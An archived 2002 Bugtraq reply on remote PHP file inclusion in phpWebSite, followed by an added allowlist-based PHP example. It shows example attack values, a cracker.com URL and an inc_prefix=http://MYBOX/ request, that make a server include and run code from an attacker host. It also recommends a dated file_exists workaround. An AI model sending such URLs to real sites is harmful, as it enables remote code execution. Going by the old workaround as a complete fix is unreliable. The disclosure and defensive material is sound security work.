[27174] in bugtraq


Re: PHP source injection in phpWebSite

daemon@ATHENA.MIT.EDU (Matthias Bauer)
Tue Sep 24 15:37:28 2002

Message-ID: <3D8FB56B.6080302@moeffju.de>
Date: Tue, 24 Sep 2002 02:44:27 +0200
From: Matthias Bauer <moeffju@moeffju.de>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Just as a side note, quite a lot of sites are open to this kind of
attack, namely including files from other servers. fopen_wrappers and
unsafe programming are to blame here.

Lots of scripts do

include($file); // $file is in GPC

So if $file is "http://www.cracker.com/somefile.php" that file gets
included, and PHP code in it gets executed.

Easy workaround: disable fopen_wrappers in php.ini, or call file_exists
before including any file.

if (file_exists($file)) include($file);

Of course, the only "real" way to fix the bug is to program safely.


On 9/23/2002 1:53 AM Tim Vandermeersch wrote:

 > If someone requests a URL like
 > http://SERVER/modsecurity.php?inc_prefix=http://MYBOX/,
 > the htmlheader.php file from MYBOX would be included,
 > and the attacker would be able to include any code he
 > wants.
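
An allowlist-based alternative to passing a request value straight to include(), as an added example that is not part of the original message; the function name resolve_include, the page names and the temporary directory are assumptions made for illustration. It does not depend on file_exists(), whose handling of URL wrappers varies between PHP versions.

```php
<?php
// Added example, not from the original post. Requires PHP 7.1 or later.
// php.ini side of the same fix in current PHP: allow_url_include = Off.

/**
 * Hypothetical helper: map a request value to a file inside $baseDir.
 * Returns the absolute path to include, or null if the value is not allowed.
 */
function resolve_include(string $name, string $baseDir, array $allowed): ?string
{
    // Only exact allowlist keys are accepted, so URLs and "../" never match.
    if (!isset($allowed[$name])) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Resolve symlinks, then confirm the result is still inside $baseDir.
    $path = realpath($base . DIRECTORY_SEPARATOR . $allowed[$name]);
    if ($path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed sample: a temporary include directory holding one page file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inc_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'header.php', '<?php echo "header ok\n";');
$allowed = ['header' => 'header.php'];

// Constructed request values: one valid page name, one URL, one traversal.
foreach (['header', 'http://MYBOX/', '../../etc/passwd'] as $input) {
    $path = resolve_include($input, $dir, $allowed);
    if ($path === null) {
        echo "rejected: $input\n";
    } else {
        include $path;   // only ever a local file named in $allowed
    }
}

// Remove the constructed sample files.
unlink($dir . DIRECTORY_SEPARATOR . 'header.php');
rmdir($dir);
```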



